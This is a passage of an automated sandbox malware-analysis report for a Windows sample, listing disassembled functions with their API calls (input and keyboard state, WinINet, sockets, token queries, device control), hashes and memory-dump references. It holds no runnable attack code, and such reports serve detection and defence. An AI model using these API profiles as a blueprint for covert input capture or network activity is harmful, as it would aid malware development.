                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: KeyboardState$InputMessagePostSend
                                                                                  • String ID:
                                                                                  • API String ID: 432972143-0
                                                                                  • Opcode ID: 85c6163834f9f361a6f97927a6aaa51a71fef9d7cc7f850f6ff04bfd25815c27
                                                                                  • Instruction ID: dd8f3a9020721c5cf545bc0e101f4bdb4457f1b56e2eb46e4bfd0f1c0c4c2d5e
                                                                                  • Opcode Fuzzy Hash: 85c6163834f9f361a6f97927a6aaa51a71fef9d7cc7f850f6ff04bfd25815c27
                                                                                  • Instruction Fuzzy Hash: D431E530A00658AFEF218BA48829BFEBFB9BB55321F04055AE485972D1CB748F85D761
                                                                                  Function 00524004 Relevance: 6.1, APIs: 4, Instructions: 96COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00524038
                                                                                  • __isleadbyte_l.LIBCMT ref: 00524066
                                                                                  • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00524094
                                                                                  • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 005240CA
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                  • String ID:
                                                                                  • API String ID: 3058430110-0
                                                                                  • Opcode ID: 038b104eb745cb3c51ddc0a9357a69336e4677b3cffcee8eae9473b00d335ac5
                                                                                  • Instruction ID: ac84d62bce894298486ef30399477f4e4490a615e4e0c8417e8b97f1aecda855
                                                                                  • Opcode Fuzzy Hash: 038b104eb745cb3c51ddc0a9357a69336e4677b3cffcee8eae9473b00d335ac5
                                                                                  • Instruction Fuzzy Hash: 3531AB30600226AFDB219F64D848AAA7FA5BF42310F158428EA658B0E0E731E8D0DB90
                                                                                  Function 00557CA5 Relevance: 6.1, APIs: 4, Instructions: 93COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetForegroundWindow.USER32 ref: 00557CB9
                                                                                    • Part of subcall function 00535F55: GetWindowThreadProcessId.USER32(?,00000000), ref: 00535F6F
                                                                                    • Part of subcall function 00535F55: GetCurrentThreadId.KERNEL32 ref: 00535F76
                                                                                    • Part of subcall function 00535F55: AttachThreadInput.USER32(00000000,?,0053781F), ref: 00535F7D
                                                                                  • GetCaretPos.USER32(?), ref: 00557CCA
                                                                                  • ClientToScreen.USER32(00000000,?), ref: 00557D03
                                                                                  • GetForegroundWindow.USER32 ref: 00557D09
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                  • String ID:
                                                                                  • API String ID: 2759813231-0
                                                                                  • Opcode ID: 9a3d94c6e23ca820e33d6a70ea7780c29dbaffa1c641f25a153de99bce15835e
                                                                                  • Instruction ID: 81a9a29cc8fb5f3aa1d8618efc892c56402fa7fbf77c7ab201308a5f5823d3b8
                                                                                  • Opcode Fuzzy Hash: 9a3d94c6e23ca820e33d6a70ea7780c29dbaffa1c641f25a153de99bce15835e
                                                                                  • Instruction Fuzzy Hash: 2D311E71900109AFDB00EFA5D8899EFBBF9FF98314F108466E815E3251DA319E459FA0
                                                                                  Function 0055F1D7 Relevance: 6.1, APIs: 4, Instructions: 80windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 0050B34E: GetWindowLongW.USER32(?,000000EB), ref: 0050B35F
                                                                                  • GetCursorPos.USER32(?), ref: 0055F211
                                                                                  • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0056E4C0,?,?,?,?,?), ref: 0055F226
                                                                                  • GetCursorPos.USER32(?), ref: 0055F270
                                                                                  • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0056E4C0,?,?,?), ref: 0055F2A6
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                  • String ID:
                                                                                  • API String ID: 2864067406-0
                                                                                  • Opcode ID: f70730e8b1ebc5e4cc765ef4411b543b893d3bb97e70efdf5b002b1984a0a450
                                                                                  • Instruction ID: 95495be8c89e7b52379cc4fd66af1dcdddbf5f232fadb150919871f18f4f817d
                                                                                  • Opcode Fuzzy Hash: f70730e8b1ebc5e4cc765ef4411b543b893d3bb97e70efdf5b002b1984a0a450
                                                                                  • Instruction Fuzzy Hash: E021CE7D500018AFCB158F94DC68EEE7FB5FF49311F44806AF9094B2A1D3309994EBA0
                                                                                  Function 0054431C Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00544358
                                                                                    • Part of subcall function 005443E2: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00544401
                                                                                    • Part of subcall function 005443E2: InternetCloseHandle.WININET(00000000), ref: 0054449E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Internet$CloseConnectHandleOpen
                                                                                  • String ID:
                                                                                  • API String ID: 1463438336-0
                                                                                  • Opcode ID: a758869a021a4a1edb8b2c2a67af44b851e4042e13c25f098d809f4ae47ea68a
                                                                                  • Instruction ID: 328b988472099dff3e49d08157be3b5676e2c4549fa4ec23f8b4806f856b7616
                                                                                  • Opcode Fuzzy Hash: a758869a021a4a1edb8b2c2a67af44b851e4042e13c25f098d809f4ae47ea68a
                                                                                  • Instruction Fuzzy Hash: 68210432240605BBDB159F609C04FFBBBB9FF84B08F10481ABA0586550D77198A4ABA0
                                                                                  Function 00548A7F Relevance: 6.1, APIs: 4, Instructions: 69networkCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • select.WSOCK32(00000000,00000001,00000000,00000000,?), ref: 00548AE0
                                                                                  • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00548AF2
                                                                                  • accept.WSOCK32(00000000,00000000,00000000), ref: 00548AFF
                                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 00548B16
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLastacceptselect
                                                                                  • String ID:
                                                                                  • API String ID: 385091864-0
                                                                                  • Opcode ID: f324366d9ed7658073a3bfcf998c5502f3ebb9d8b5039a44b4054b785aec72cb
                                                                                  • Instruction ID: deb8e2c569041f4860a2c844d7c051d5d4f1138c779d8009451f17ef73101e4e
                                                                                  • Opcode Fuzzy Hash: f324366d9ed7658073a3bfcf998c5502f3ebb9d8b5039a44b4054b785aec72cb
                                                                                  • Instruction Fuzzy Hash: 0221A771A001245FC7149F68D885A9E7FFCFF59350F00416AF849D7290DB7499458FA0
                                                                                  Function 00558A37 Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetWindowLongW.USER32(?,000000EC), ref: 00558AA6
                                                                                  • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00558AC0
                                                                                  • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00558ACE
                                                                                  • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00558ADC
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$Long$AttributesLayered
                                                                                  • String ID:
                                                                                  • API String ID: 2169480361-0
                                                                                  • Opcode ID: 330e3bf94f67f3413d8ce925d3f58c26a1a0fb45b55d413b352b1c98260e11ab
                                                                                  • Instruction ID: 730f94098e4ac37e58509e01b2c8e343f1c5bcf88a5a32b2ffe1eea5c82a0267
                                                                                  • Opcode Fuzzy Hash: 330e3bf94f67f3413d8ce925d3f58c26a1a0fb45b55d413b352b1c98260e11ab
                                                                                  • Instruction Fuzzy Hash: 9411D331205115AFDB04AB14DC19FBE7BA9BF85321F18411BF91AD72E1CBB4AC449B94
                                                                                  Function 00530AA6 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00531E68: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00530ABB,?,?,?,0053187A,00000000,000000EF,00000119,?,?), ref: 00531E77
                                                                                    • Part of subcall function 00531E68: lstrcpyW.KERNEL32(00000000,?,?,00530ABB,?,?,?,0053187A,00000000,000000EF,00000119,?,?,00000000), ref: 00531E9D
                                                                                    • Part of subcall function 00531E68: lstrcmpiW.KERNEL32(00000000,?,00530ABB,?,?,?,0053187A,00000000,000000EF,00000119,?,?), ref: 00531ECE
                                                                                  • lstrlenW.KERNEL32(?,00000002,?,?,?,?,0053187A,00000000,000000EF,00000119,?,?,00000000), ref: 00530AD4
                                                                                  • lstrcpyW.KERNEL32(00000000,?,?,0053187A,00000000,000000EF,00000119,?,?,00000000), ref: 00530AFA
                                                                                  • lstrcmpiW.KERNEL32(00000002,cdecl,?,0053187A,00000000,000000EF,00000119,?,?,00000000), ref: 00530B2E
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: lstrcmpilstrcpylstrlen
                                                                                  • String ID: cdecl
                                                                                  • API String ID: 4031866154-3896280584
                                                                                  • Opcode ID: 99987c3daaafa6d793d23af02e303c45feb27325dd2009f9c1c72413289269f4
                                                                                  • Instruction ID: 5656e0cc8ae6014f3e4c7faa020769921e1979bfd6acf965821d0766852c5c12
                                                                                  • Opcode Fuzzy Hash: 99987c3daaafa6d793d23af02e303c45feb27325dd2009f9c1c72413289269f4
                                                                                  • Instruction Fuzzy Hash: 52119336200305AFDB25AF34DC65D7EBBB8FF85354F80506AE80ACB290EB719950D7A0
                                                                                  Function 00522F96 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _free.LIBCMT ref: 00522FB5
                                                                                    • Part of subcall function 0051395C: __FF_MSGBANNER.LIBCMT ref: 00513973
                                                                                    • Part of subcall function 0051395C: __NMSG_WRITE.LIBCMT ref: 0051397A
                                                                                    • Part of subcall function 0051395C: RtlAllocateHeap.NTDLL(015B0000,00000000,00000001,00000001,00000000,?,?,0050F507,?,0000000E), ref: 0051399F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: AllocateHeap_free
                                                                                  • String ID:
                                                                                  • API String ID: 614378929-0
                                                                                  • Opcode ID: c47d9dfc3e0b72d173e5c08d87fa47e1b7fd315071ab2732d616d2a6fab2ea1b
                                                                                  • Instruction ID: 81abf129ddaf9d3709bd81430c56d72546338595d13bedf51ce615417280a1fd
                                                                                  • Opcode Fuzzy Hash: c47d9dfc3e0b72d173e5c08d87fa47e1b7fd315071ab2732d616d2a6fab2ea1b
                                                                                  • Instruction Fuzzy Hash: 3411EB32408637ABEB213B74BC0D69A3FB4BF99364F204915F9099A1D1DB74CD809AE0
                                                                                  Function 0053058F Relevance: 6.1, APIs: 4, Instructions: 64registryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 005305AC
                                                                                  • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 005305C7
                                                                                  • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 005305DD
                                                                                  • FreeLibrary.KERNEL32(?), ref: 00530632
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Type$FileFreeLibraryLoadModuleNameRegister
                                                                                  • String ID:
                                                                                  • API String ID: 3137044355-0
                                                                                  • Opcode ID: d5f3d6e22510dfaf50542049fa86c2c89e9e79a7c37f0af1c9f308e2be58f8dd
                                                                                  • Instruction ID: 98999f71c8acda29adf30f8484cef3c097d9edc562ee1c7162e01f3258d70ccd
                                                                                  • Opcode Fuzzy Hash: d5f3d6e22510dfaf50542049fa86c2c89e9e79a7c37f0af1c9f308e2be58f8dd
                                                                                  • Instruction Fuzzy Hash: ED218771900309EFDB208F91DC99ADABFBCFF80700F009869E51692190D770EA55EF60
                                                                                  Function 00536713 Relevance: 6.1, APIs: 4, Instructions: 64fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00536733
                                                                                  • _memset.LIBCMT ref: 00536754
                                                                                  • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 005367A6
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 005367AF
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseControlCreateDeviceFileHandle_memset
                                                                                  • String ID:
                                                                                  • API String ID: 1157408455-0
                                                                                  • Opcode ID: 2a440e8eb1fee4d413d6782c29d868c0af705d8980861753972c68b499e35ea9
                                                                                  • Instruction ID: e64d262e260ff2868cded07fbc076f7ff6030a3c249f1ed22c426f7f6507806d
                                                                                  • Opcode Fuzzy Hash: 2a440e8eb1fee4d413d6782c29d868c0af705d8980861753972c68b499e35ea9
                                                                                  • Instruction Fuzzy Hash: 101106769012287AE7209BA5AC4DFEBBBBCEF44724F10419AF508E71D0D2704E84CBB4
                                                                                  Function 0052B1CC Relevance: 6.1, APIs: 4, Instructions: 63memoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 0052AA62: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 0052AA79
                                                                                    • Part of subcall function 0052AA62: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 0052AA83
                                                                                    • Part of subcall function 0052AA62: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 0052AA92
                                                                                    • Part of subcall function 0052AA62: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 0052AA99
                                                                                    • Part of subcall function 0052AA62: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0052AAAF
                                                                                  • GetLengthSid.ADVAPI32(?,00000000,0052ADE4,?,?), ref: 0052B21B
                                                                                  • GetProcessHeap.KERNEL32(00000008,00000000), ref: 0052B227
                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 0052B22E
                                                                                  • CopySid.ADVAPI32(?,00000000,?), ref: 0052B247
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Heap$AllocInformationProcessToken$CopyErrorLastLength
                                                                                  • String ID:
                                                                                  • API String ID: 4217664535-0
                                                                                  • Opcode ID: b126b3ba542883814d285b1d11ac2b37dec0c208bab896729343d754d100f4b0
                                                                                  • Instruction ID: fbed3e2b0273baef5220aa6e464d624fe806805ba33dd5723abce2654a342703
                                                                                  • Opcode Fuzzy Hash: b126b3ba542883814d285b1d11ac2b37dec0c208bab896729343d754d100f4b0
                                                                                  • Instruction Fuzzy Hash: 5311C475A00215EFDB049F54ED44AAEBBB9FF96304F14802DE54697251D7319E44DB20
                                                                                  Function 0052B478 Relevance: 6.1, APIs: 4, Instructions: 58windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 0052B498
                                                                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0052B4AA
                                                                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0052B4C0
                                                                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0052B4DB
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend
                                                                                  • String ID:
                                                                                  • API String ID: 3850602802-0
                                                                                  • Opcode ID: 4f35d84227dc071af028662649af8fb24004985e4dd97f57934572eedb109825
                                                                                  • Instruction ID: e747ae3ac3daf148f15ed3572a7b5f508ffdad4332eb879f88e05f3080230d17
                                                                                  • Opcode Fuzzy Hash: 4f35d84227dc071af028662649af8fb24004985e4dd97f57934572eedb109825
                                                                                  • Instruction Fuzzy Hash: 5111367A900228BFEF11EBA8D885E9DBBB5FF09710F204091E604B7290D771AE10DB94
                                                                                  Function 0050B55D Relevance: 6.1, APIs: 4, Instructions: 56COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 0050B34E: GetWindowLongW.USER32(?,000000EB), ref: 0050B35F
                                                                                  • DefDlgProcW.USER32(?,00000020,?,00000000), ref: 0050B5A5
                                                                                  • GetClientRect.USER32(?,?), ref: 0056E69A
                                                                                  • GetCursorPos.USER32(?), ref: 0056E6A4
                                                                                  • ScreenToClient.USER32(?,?), ref: 0056E6AF
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Client$CursorLongProcRectScreenWindow
                                                                                  • String ID:
                                                                                  • API String ID: 4127811313-0
                                                                                  • Opcode ID: a07b50c0e5401ca05fd37e454e376cc6d452102e33e1816955ffa2c337baa68a
                                                                                  • Instruction ID: 7d445f49c4349074dc78bf2d7180699e323a629ca64b744b6c6181bc70c92942
                                                                                  • Opcode Fuzzy Hash: a07b50c0e5401ca05fd37e454e376cc6d452102e33e1816955ffa2c337baa68a
                                                                                  • Instruction Fuzzy Hash: EB113A3550042ABBDB10DF54DC8A8EE7BB8FF58305F100491E902E7180D734BA85DBB5
                                                                                  Function 0053732B Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00537352
                                                                                  • MessageBoxW.USER32(?,?,?,?), ref: 00537385
                                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0053739B
                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 005373A2
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
